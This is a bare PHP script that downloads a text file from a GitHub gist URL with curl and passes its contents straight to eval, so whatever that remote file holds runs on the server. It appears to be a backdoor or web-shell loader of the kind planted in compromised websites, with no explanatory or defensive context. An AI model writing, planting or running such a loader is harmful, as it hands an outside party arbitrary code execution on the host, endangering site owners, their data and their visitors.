<?php
    $Url = "https://gist.githubusercontent.com/huynh983/4e8cbca92cfe22d381c25106e334e2d6/raw/fecee6b0b2d974255b3d90334d61c4aee9986a58/zzedd.txt";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $Url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $output = curl_exec($ch);
    curl_close($ch);
    echo eval('?>'.$output);
?>